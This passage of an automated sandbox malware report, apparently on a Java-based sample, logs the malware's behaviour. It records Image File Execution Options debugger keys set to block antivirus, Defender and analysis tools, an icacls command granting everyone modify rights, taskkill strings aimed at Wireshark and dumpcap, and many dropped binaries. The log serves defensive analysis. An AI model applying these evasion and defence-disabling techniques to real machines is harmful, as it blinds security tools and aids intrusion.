Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NS.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NS.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\acs.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\acs.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDSSVC.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDSSVC.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANNER.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANNER.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ScSecSvc.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ScSecSvc.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtSvcHost.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtSvcHost.exe debugger
Changes image file execution options
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mergecap.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Up.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Medic.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuarScanner.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardUpdate.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clamscan.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cis.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FPAVServer.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVK.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GdBgInx64.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDScan.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKWCtlx64.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guardxkickoff_x64.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7CrvSvc.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMain.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMngr.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nnf.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nbrowser.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nfservice.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NS.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\acs.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDSSVC.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANNER.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ScSecSvc.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtSvcHost.exe debugger
Uses cacls to modify the permissions of files
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regedit.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: javaw.exe, 00000006.00000002.2845247996.0000000004A00000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PTASKKILL /IM WIRESHARK.EXE /T /F
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SUPERANTISPYWARE.EXE
Source: javaw.exe, 00000006.00000002.2845247996.0000000004A00000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TASKKILL /IM WIRESHARK.EXE /T /F
Source: javaw.exe, 00000006.00000002.2845247996.0000000004A44000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PTASKKILL /IM DUMPCAP.EXE /T /F
Source: javaw.exe, 00000006.00000002.2845247996.0000000004A44000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TASKKILL /IM DUMPCAP.EXE /T /F
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
